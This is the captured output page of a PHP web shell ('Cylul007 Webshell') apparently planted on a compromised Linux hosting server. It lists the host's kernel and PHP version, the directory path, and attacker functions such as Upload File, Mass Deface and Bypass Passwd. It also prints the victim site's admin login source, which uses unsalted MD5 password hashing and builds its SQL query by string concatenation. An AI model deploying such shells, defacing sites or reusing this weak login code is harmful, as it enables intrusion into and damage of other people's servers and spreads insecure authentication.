Cylul007 Webshell
Server :
Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
php :
8.0.30
on
cgi-fcgi
Time
25 Nov 2024 20:41:35
Current Directory :
/
home
/
amvm
/
www
/
manal
/
myadmin
/
Upload File :
Mass Deface
Home
Bypass Passwd
Current File : /home/amvm/www/manal/myadmin/log.php
<?php include('config.php'); //session_start(); if (!isset($_SESSION['users_id'])) { if($_SERVER['REQUEST_METHOD'] == "POST") { //Username and Password sent from Form $username = mysqli_real_escape_string($mysql_con, $_POST['user']); $password = mysqli_real_escape_string($mysql_con, $_POST['pass']); $password = md5($password); $sql = "SELECT * FROM users WHERE username ='$username' AND password ='$password'"; $query = mysqli_query($mysql_con, $sql); $res=mysqli_num_rows($query); //If result match $username and $password Table row must be 1 row if($res == 1) { $_SESSION['username'] = $username; $_SESSION['password'] = $password ; $_SESSION['login'] = true; header("Location: index.php"); } else { echo "Invalid Username or Password"; } } } ?> <!doctype html> <html> <head> <meta charset="UTF-8"> <title>Admin Login</title> </head> <body> <h1>Login</h1> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <label>Username</label> <input type="text" name="user"><br/><br/> <label>Password</label> <input type="password" name="pass"><br/><br/> <input type="submit" name="submit" value="Login"><br/> </form> </body> </html>
./LuLlaby007 ♥ Tata Cantik - Copyright 2k18